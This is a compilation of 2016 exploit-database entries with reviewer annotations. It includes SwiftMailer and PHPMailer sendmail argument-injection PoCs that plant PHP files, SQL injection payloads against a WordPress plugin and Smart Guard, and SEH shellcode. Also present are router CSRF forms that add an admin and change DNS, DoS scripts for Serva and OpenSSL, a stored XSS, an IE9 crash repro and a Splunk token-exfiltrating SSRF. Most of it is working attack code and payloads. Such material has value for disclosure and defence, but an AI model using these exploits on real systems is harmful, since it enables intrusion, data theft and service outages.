https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Exploit code URL:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.

Reviewer notes: the sender address below reaches sendmail as the -f
(envelope sender) argument, where the MTA splits it into further options.
Any address that ends up on an MTA command line should be validated against
a strict address grammar, with embedded whitespace and quotes rejected.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
// Single-quoted PHP string, so the backslashes are literal: the quoted local
// part is closed early and two sendmail options (-oQ queue directory, -X
// transfer-log path) are smuggled in ahead of the "@email.com" tail.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// ------------------
// mail() param injection via the vulnerability in SwiftMailer
require_once 'lib/swift_required.php';
// Mail transport: Swift_MailTransport hands the message to PHP's mail(),
// which in turn runs the local sendmail binary.
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
// Create a message; the crafted address is used as the From address.
$message = Swift_Message::newInstance('Swift PoC exploit')
    ->setFrom(array($email_from => 'PoC Exploit Payload'))
    ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
    ->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
?>
# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1 - Description
An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.
2. Proof of Concept
sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3
Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read and write access to the filesystem may be possible.
4 Impact:
Critical
5. Affected versions:
<= 1.4.1
6. Disclosure Timeline:
21-Dec-2016 found the vulnerability
21-Dec-2016 informed the developer
28-Dec-2016 release date of this security advisory
Not fixed at the date of submitting that exploit.
#!/usr/bin/env python
#
#
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
#
#
# Vendor: Patrick Masotta
# Product web page: http://www.vercot.com
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
#
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
# on a single exe all of the underlying server protocols and services required by the
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
# non-Windows assets to BIOS and UEFI based targets.
#
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
# This can be exploited to cause a denial of service attack resulting in application crash.
#
# ----------------------------------------------------------------------------
#
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
# KERNELBASE!RaiseException+0x58:
# 74a1c54f c9 leave
# 0:013> kb
# # ChildEBP RetAddr Args to Child
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5378
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
#
#
# 17.11.2016
#
import sys,socket

# Usage check: <target> and <port> are both required.
if len(sys.argv) < 3:
    print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
    print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
    sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect() returns None; the assignment is never used.
connect = s.connect((host, port))
# Set after connect(), so the 251 s timeout applies only to the send below.
s.settimeout(251)
# A single non-HTTP byte is all that is sent (see the crash trace in the header).
s.send('z')
# NOTE(review): missing parentheses -- this references the method without
# calling it, so the socket is only closed when the interpreter exits.
s.close
<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.

Reviewer notes: the sender address below reaches sendmail as the -f
(envelope sender) argument, where the MTA splits it into further options;
5.2.18 is the version named above as fixed. Any address that ends up on an
MTA command line should be validated against a strict address grammar, with
embedded whitespace and quotes rejected.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
// Single-quoted PHP string, so the backslashes are literal: the quoted local
// part is closed early and two sendmail options (-oQ queue directory, -X
// transfer-log path) are smuggled in ahead of the some"@email.com tail.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
// Message body that the transfer log reproduces verbatim (see header).
$msg_body = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()", which runs the local sendmail binary
// The crafted address is used as the From/envelope sender.
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
// Send() reports failure via its return value; ErrorInfo holds the reason.
if(!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!\n";
}
?>
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux
Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')
The menu_id GET parameter on <base url>/view_logs/search_all_history.php is
not filtered properly and leads to SQL Injection
Authentication Required: No
SQL injection type: error/xpath.
Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -
So a user can fetch admin details and can easily get root on that server
if the server is SmartGuard 6.0A Revolutions, as PHP runs as the root user by
default.
This vulnerability can make the whole server vulnerable.
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################
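def write_poc(fname, buffer):
    """Write *buffer* verbatim to *fname*, creating or truncating the file.

    Args:
        fname: path of the file to write.
        buffer: the raw content to write (a str under Python 2, bytes
            under Python 3, since the file is opened in binary mode).

    Raises:
        IOError/OSError: if the file cannot be opened or written.
    """
    # A context manager closes the handle even when write() raises, so a
    # failed write never leaves an open file descriptor behind.
    with open(fname, 'wb') as fhandle:
        fhandle.write(buffer)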
# Output file; its contents are pasted into Help->Enter registration code
# (see the header) to reproduce the crash.
fname="poc.txt"
# Leading padding: 0xfe0 bytes of 'A'.
buf = '\x41' * 0xfe0
#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
# More 'A' filler, followed by the two 4-byte values named after their
# role in the SEH overwrite (see the exploit title).
junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
# The concatenation order is the layout the PoC depends on.
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
Title: EasyPHP Devserver Insecure File Permissions Privilege Escalation
Application: EasyPHP Devserver
Versions Affected: 16.1
Vendor URL: http://www.easyphp.org/
Discovered by: Ashiyane Digital Security Team ~ Micle
Tested on: Windows 10 Professional x86
Bugs: Insecure File Permissions Privilege Escalation
Source: http://www.micle.ir/exploits/1003
Date: 10-Dec-2016
Description:
EasyPHP installs by default to "C:\Program Files\EasyPHP-Devserver-16.1"
with very weak file permissions granting any
user full permission to the exe. This allows opportunity for code
execution against any other user running the application.
Proof:
C:\Program Files\EasyPHP-Devserver-16.1>cacls run-easyphp-devserver.exe
C:\Program Files\EasyPHP-Devserver-16.1\run-easyphp-devserver.exe
BUILTIN\Users:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(ID)R
Exploit:
Simply replace run-easyphp-devserver.exe and wait for execution.
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
1 - Denial of Service
#!/usr/bin/python
import urllib2
import urllib
# The router's vulnerable CGI endpoint, appended to the base URL typed in.
site = raw_input("Enter Url : ") + "/form2Upnp.cgi"
# Factory-default credentials, sent via HTTP basic auth.
username = 'admin'
password = 'admin'
auth_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
auth_mgr.add_password(None, site, username, password)
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth_mgr)))
# Form fields of the UPnP page submission.
data = urllib.urlencode({
    'daemon': ' ',
    'ext_if': 'pppoe+1',
    'submit.htm?upnp.htm': 'Send',
})
try:
    urllib2.urlopen(site, data)
except:
    # A failed request is reported exactly like a completed one; the
    # catch-all also hides unrelated errors such as a malformed URL.
    pass
print ("Done ! c_C")
2-1 Cross-Site Request Forgery (Add Admin)
<!-- PoC: cross-site POST to the router's user-config CGI.  No anti-CSRF
     token appears among the fields, so a browser that is logged in to
     192.168.1.1 and loads this page submits the "add user" form with
     privilege 2.  Note: type="texr" on the confirm field is a typo; browsers
     treat an unknown input type as "text", so the form still submits. -->
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
USER:<input type="text" name="username" value="mobham" />
<input type="hidden" name="privilege" value="2" />
PWD:<input type="text" name="newpass" value="mobham" />
RPWD:<input type="texr" name="confpass" value="mobham" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2-2 Cross-Site Request Forgery (Change DNS)
<!-- PoC: cross-site POST to the router's DNS CGI.  As with the user-config
     form, there is no anti-CSRF token; dnsMode=1 plus the dns1/dns2 values
     and the "Apply Changes" field are what the router's own page submits. -->
<html>
<body>
<form action="http://192.168.1.1/form2Dns.cgi" method="POST">
<input type="hidden" name="dnsMode" value="1" />
DNS<input type="text" name="dns1" value="2.2.2.2" />
DNS 2<input type="text" name="dns2" value="1.1.1.1" />
DNS 3<input type="text" name="dns3" value="" />
<input type="hidden" name="submit.htm?dns.htm" value="Send" />
<input type="hidden" name="save" value="Apply Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date
-Vulnerability
A user who can send DHCP requests over a VPN or wireless connection can supply a host name containing script tags to trigger XSS.
This could potentially be used to connect to an open or guest WiFi hotspot, inject stored XSS into the admin panel and steal the authentication cookie.
http://RouterIP/start.htm
Then visit the "view who's connected" page.
-Proof Of Concept
Set /etc/dhcp/dhclient.conf
send host-name "<script>alert('xss')</script>";
<!--
Source: http://blog.skylined.nl/20161209001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. In addition, EIP said they were already aware of the bug and provided no details; this issue appears to have been fixed before ZDI was able to look at it. I have included a number of reports created using a predecessor of BugId below.
Repro.html:
-->
<html>
<head>
<!-- Reduced fuzzer test case for the IE9 issue described above.  The two
     helper scripts are the getElementTree.js and show.html listings that
     follow this document; they only dump the DOM for inspection.  As the
     inline comments explain, the corruption is triggered by the second
     document.write after the execCommand calls. -->
<script src="getElementTree.js"></script>
<script src="show.html"></script>
<script>
// First tag can be any inline but must NOT be closed yet
// Second tag can be anything that's not inline.
// "text1" can be anything
document.write('<s><br>text1');
// The tree is in good shape.
show("DOM Tree after first write", getElementTree(document.body));
// At this point, it appears that MSIE is still waiting for the first tag from the first write to be closed.
// Inserting a P tag using any of the "Justify*"-, "Indent"- or "Outdent"-execCommands will mess up the DOM tree,
// specifically for the "Justify*"- and "Outdent"-execCommand:
// - the S tag will partially become a child of the P tag:
// P.lastChild == S (but P.childNodes = [BR, text1])
// - the P tag will partially become a child of the S tag:
// S.firstChild == P and S.childNodes = [P] (but S.lastChild = text1)
// - The P partially becomes a child of the BODY tag:
// BODY.lastChild = P (but BODY.firstChild = S and BODY.childNodes = [S])
// (The situation is similar for "Indent", but includes a BLOCKQUOTE element)
document.execCommand('SelectAll');
document.execCommand('JustifyRight');
show("DOM Tree after outdent", getElementTree(document.body));
// At this point, MSIE is not yet crashing. However, another write will corrupt memory:
document.write('text2');
// You will probably not see this popup. If you do, it will display an obviously corrupt DOM element tree.
show("DOM Tree after write", getElementTree(document.body));
</script>
</head>
</html>
<!--
getElementTree.js:
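// Render the DOM subtree rooted at oRootElement as a text tree for inspection.
//
// Besides walking childNodes, every node's parentNode / previousSibling /
// nextSibling / firstChild / lastChild is compared with what the walk
// expects, and any mismatch is appended to that node's line.  A node named
// by a mismatching property but never reached through childNodes is queued
// and, when bIncludeAll is true, rendered as an additional block after the
// main tree; with bIncludeAll false only the first block is returned.
//
// Every DOM property read sits in its own try/catch because the tree this
// was written to inspect may be corrupted and throw on access.
// Returns one string, lines and blocks joined with "\r\n".
function getElementTree(oRootElement, bIncludeAll) {
  // Short label for a node: the tag name, or nodeName:"data" for non-elements.
  function getElementName(oElement) {
    return oElement ? (oElement.tagName || oElement.nodeName + ':"' + oElement.data + '"') : "null";
  }
  // Render oElement and its children as an array of lines.  The oExpected*
  // arguments are the links the caller believes the node has; sFirstLinePrefix
  // and sSubLinesPrefix are the box-drawing indents for this node and its children.
  function getElementTreeLines(oElement, oExpectedParent, oExpectedPreviousSibling, oExpectedNextSibling,
      sFirstLinePrefix, sSubLinesPrefix) {
    if (!oElement) return [sFirstLinePrefix + "null"];
    var aoChildren = oElement.childNodes,
        sHeader = sFirstLinePrefix + getElementName(oElement);
    try {
      if (oExpectedParent && oElement.parentNode != oExpectedParent)
        sHeader += " (parent:" + getElementName(oElement.parentNode) + ")";
    } catch (e) {
      sHeader += " (parent error:" + e.message + ")";
    }
    try {
      if (oElement.previousSibling != oExpectedPreviousSibling) {
        sHeader += " (previousSibling:" + getElementName(oElement.previousSibling) + ")";
        // Only queue the unexpected sibling when one was expected at all.
        oExpectedPreviousSibling && aoShouldBeIncludedElements.push(oElement.previousSibling);
      }
    } catch (e) {
      sHeader += " (previousSibling error:" + e.message + ")";
    }
    try {
      if (oElement.nextSibling != oExpectedNextSibling) {
        sHeader += " (nextSibling:" + getElementName(oElement.nextSibling) + ")";
        oExpectedNextSibling && aoShouldBeIncludedElements.push(oElement.nextSibling);
      }
    } catch (e) {
      sHeader += " (nextSibling error:" + e.message + ")";
    }
    try {
      if (aoChildren.length > 0 && oElement.firstChild != aoChildren.item(0)) {
        sHeader += " (firstChild:" + getElementName(oElement.firstChild) + ")";
        aoShouldBeIncludedElements.push(oElement.firstChild);
      }
    } catch (e) {
      sHeader += " (firstChild error:" + e.message + ")";
    }
    // A node reached a second time (possible in a corrupted tree) is reported
    // once and not descended into again; since a node is registered before its
    // children are walked, this also stops cycles from recursing forever.
    for (var i = 0; i < aoActuallyIncludedElements.length; i++) {
      if (aoActuallyIncludedElements[i] == oElement) {
        return [sHeader + " => previously referenced!"];
      }
    }
    // The lastChild mismatch is printed after the children, so it is kept aside.
    var sLastChildErrorLine = null;
    try {
      if (aoChildren.length > 0 && oElement.lastChild != aoChildren.item(aoChildren.length - 1)) {
        sLastChildErrorLine = sSubLinesPrefix + "\u2514 lastChild:" + getElementName(oElement.lastChild);
        aoShouldBeIncludedElements.push(oElement.lastChild);
      }
    } catch (e) {
      sLastChildErrorLine = sSubLinesPrefix + "\u2514 lastChild error:" + e.message;
    }
    aoActuallyIncludedElements.push(oElement);
    var asTree = [sHeader], oPreviousSibling = null;
    for (var i = 0; i < aoChildren.length; i++) {
      var oChild;
      try {
        oChild = aoChildren.item(i);
      } catch (e) {
        asTree.push(sSubLinesPrefix + (i == aoChildren.length - 1 ? "\u255A" : "\u2560") + "child error:" + e.message);
        continue;
      }
      var oNextSibling;
      try {
        oNextSibling = i + 1 <= aoChildren.length - 1 ? aoChildren.item(i + 1) : null;
      } catch (e) {
        // A non-null placeholder, so the child is reported as mismatching
        // its expected next sibling instead of silently matching null.
        oNextSibling = "error: " + e.message;
      }
      var bLast = i == aoChildren.length - 1;
      var asChildTree = getElementTreeLines(oChild, oElement, oPreviousSibling, oNextSibling,
          sSubLinesPrefix + (bLast ? "\u255A" : "\u2560"),
          sSubLinesPrefix + (bLast ? (sLastChildErrorLine ? "\u2502" : " ") : "\u2551"));
      oPreviousSibling = oChild;
      // Declared with `var`: the original assigned to `j` without declaring
      // it, so it silently shared the enclosing function's loop index.
      for (var j = 0; j < asChildTree.length; j++) {
        asTree.push(asChildTree[j]);
      }
    }
    if (sLastChildErrorLine) {
      asTree.push(sLastChildErrorLine);
    }
    return asTree;
  }
  var aoShouldBeIncludedElements = [oRootElement], aoActuallyIncludedElements = [];
  var asTreeBlocks = [];
  find_next_missing_element:
  while (aoShouldBeIncludedElements.length) {
    var oShouldBeIncludedElement = aoShouldBeIncludedElements.pop();
    // Skip anything already rendered inside an earlier block.
    for (var j = 0; j < aoActuallyIncludedElements.length; j++) {
      if (oShouldBeIncludedElement == aoActuallyIncludedElements[j]) {
        continue find_next_missing_element;
      }
    }
    // Queued extras are rendered from their own (possibly corrupt) links; a
    // node without a parent gets no prefix.  `var` added: the original
    // assigned asTreeLines without declaring it (an implicit global).
    var asTreeLines = getElementTreeLines(oShouldBeIncludedElement, oShouldBeIncludedElement.parentNode,
        oShouldBeIncludedElement.previousSibling, oShouldBeIncludedElement.nextSibling,
        oShouldBeIncludedElement.parentNode ? "\u255A" : "",
        oShouldBeIncludedElement.parentNode ? " " : "");
    asTreeBlocks.push(asTreeLines.join("\r\n"));
    if (!bIncludeAll) break;
  }
  return asTreeBlocks.join("\r\n");
}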
show.html:
//<!--
// Display sMessage (HTML) in a modal dialog titled sTitle.  It re-opens this
// same file through IE's showModalDialog; when loaded as the dialog document,
// the markup that follows the function reads the two values back out of
// window.dialogArguments.
function show(sTitle, sMessage) {
  showModalDialog("show.html", [sTitle, "<pre>" + sMessage + "</pre>"],
    "dialogWidth:800px; dialogHeight:600px; resizable:yes");
}
/*-->
<script>
document.body.innerHTML = window.dialogArguments[1];
document.title = window.dialogArguments[0];
</script>
<!-- */ // -->
Time-line
27 September 2012: This vulnerability was found through fuzzing.
7 November 2012: This vulnerability was submitted to EIP.
27 November 2012: This vulnerability was rejected by EIP.
28 November 2012: This vulnerability was submitted to ZDI.
Between December 2012 and February 2013: Microsoft addresses this vulnerability.
27 February 2012: This vulnerability was rejected by ZDI.
8 December 2016: Details of this vulnerability are released.
I would like to note that although ZDI did not acquire the vulnerability as it was patched before they could finish analysis, they did offer me ZDI reward points as a courtesy.
-->
# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
# Date: 11-12-2016
# Software Link: https://www.openssl.org/source/old/1.1.0/
# Exploit Author: Silverfox
# Contact: http://twitter.com/___Silverfox___
# Website: https://www.silverf0x00.com/
# CVE: CVE-2016-7054
# Category: Denial of Service
# Type: Remote
# Platform: Multiple
1. Description
A remote unauthenticated user can negotiate a ChaCha20-Poly1305 cipher suite and send a message of sufficient length with a bad MAC, triggering the vulnerable code path that zeroes out heap memory and forces the vulnerable OpenSSL instance to crash.
https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054
https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
2. Proof of Concept
a. Download and compile OpenSSL 1.1.0a or b
b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
d. OpenSSL Instance crashes causing DOS
### Exploit Code ###
'''
* In no event shall the author be liable
* for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
'''
from __future__ import print_function
import traceback
import sys
from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
FinishedGenerator, ApplicationDataGenerator, \
fuzz_encrypted_message
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
ExpectAlert, ExpectClose, ExpectServerKeyExchange
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
def usage():
    """Return the one-line usage banner, naming the running script."""
    script = sys.argv[0]
    return 'Usage ./%s Destination_IP Destination_Port' % script
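def main():
    """Run one TLS 1.2 handshake and send a corrupted application record.

    The conversation negotiates a ChaCha20-Poly1305 suite, flips one bit
    of the encrypted application-data record and expects the server to
    answer with a fatal bad_record_mac alert and close.  On an affected
    OpenSSL (1.1.0a/1.1.0b, see the description above) the server crashes
    instead; 1.1.0c and later are fixed.

    Returns:
        -1 when the destination IP/port arguments are missing; otherwise
        None.  Calls sys.exit(1) if any conversation failed.
    """
    if len(sys.argv) < 3:
        print(usage())
        return -1
    conversations = {}
    # 16 chars: POLY1305 tag 128 bit
    # Tampering one bit suffices to damage the mac
    # The payload has to be long enough to trigger heap overflow
    n = 15000
    # (byte position, xor mask); presumably -1 addresses the last byte of
    # the record, i.e. inside the tag -- verify against fuzz_encrypted_message.
    fuzzes = [(-1, 1)]
    for pos, val in fuzzes:
        conversation = Connect(sys.argv[1], int(sys.argv[2]))
        node = conversation
        ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
        node = node.add_child(ClientHelloGenerator(ciphers))
        node = node.add_child(ExpectServerHello())
        node = node.add_child(ExpectCertificate())
        node = node.add_child(ExpectServerKeyExchange())
        node = node.add_child(ExpectServerHelloDone())
        node = node.add_child(ClientKeyExchangeGenerator())
        node = node.add_child(ChangeCipherSpecGenerator())
        node = node.add_child(FinishedGenerator())
        node = node.add_child(ExpectChangeCipherSpec())
        node = node.add_child(ExpectFinished())
        node = node.add_child(fuzz_encrypted_message(
            ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos: val}))
        # A healthy server rejects the damaged record with this alert.
        node = node.add_child(ExpectAlert(AlertLevel.fatal,
                                          AlertDescription.bad_record_mac))
        node = node.add_child(ExpectClose())
        conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
            conversation
    # run the conversation
    good = 0
    bad = 0
    for conversation_name, conversation in conversations.items():
        #print(conversation_name + "...")
        runner = Runner(conversation)
        res = True
        try:
            runner.run()
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C and SystemExit are
            # not counted as a failed conversation.
            print("Error while processing")
            print(traceback.format_exc())
            res = False
        if res:
            good += 1
            print("OK")
        else:
            bad += 1
    print("Test end")
    print("successful: {0}".format(good))
    print("failed: {0}".format(bad))
    if bad > 0:
        sys.exit(1)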
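if __name__ == "__main__":
    # Propagate main()'s -1 (missing arguments) as a non-zero exit status;
    # a normal return (None) exits 0, and main() already exits 1 on failures.
    sys.exit(main())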
### End of Exploit Code ###
3. Solution:
Update OpenSSL to version 1.1.0c or later; versions earlier than 1.1.0a are not affected by this vulnerability.
'''
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Splunk Enterprise Server-Side Request Forgery
Affected versions: Splunk Enterprise <= 6.4.3
PDF:
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
+-----------+
|Description|
+-----------+
The Splunk Enterprise application is affected by a server-side request
forgery vulnerability. This vulnerability can be exploited by an
attacker via social engineering or other vectors to exfiltrate
authentication tokens for the Splunk REST API to an external domain.
+------------+
|Exploitation|
+------------+
==Server-Side Request Forgery==
A server-side request forgery (SSRF) vulnerability exists in the Splunk
Enterprise web management interface within the Alert functionality. The
application parses user supplied data in the GET parameter ‘alerts_id’
to construct a HTTP request to the splunkd daemon listening on TCP port
8089. Since no validation is carried out on the parameter, an attacker
can specify an external domain and force the application to make a HTTP
request to an arbitrary destination host. The issue is aggravated by the
fact that the application includes the REST API token for the currently
authenticated user within the Authorization request header.
This vulnerability can be exploited via social engineering to obtain
unauthorized access to the Splunk REST API with the same privilege level
of the captured API token.
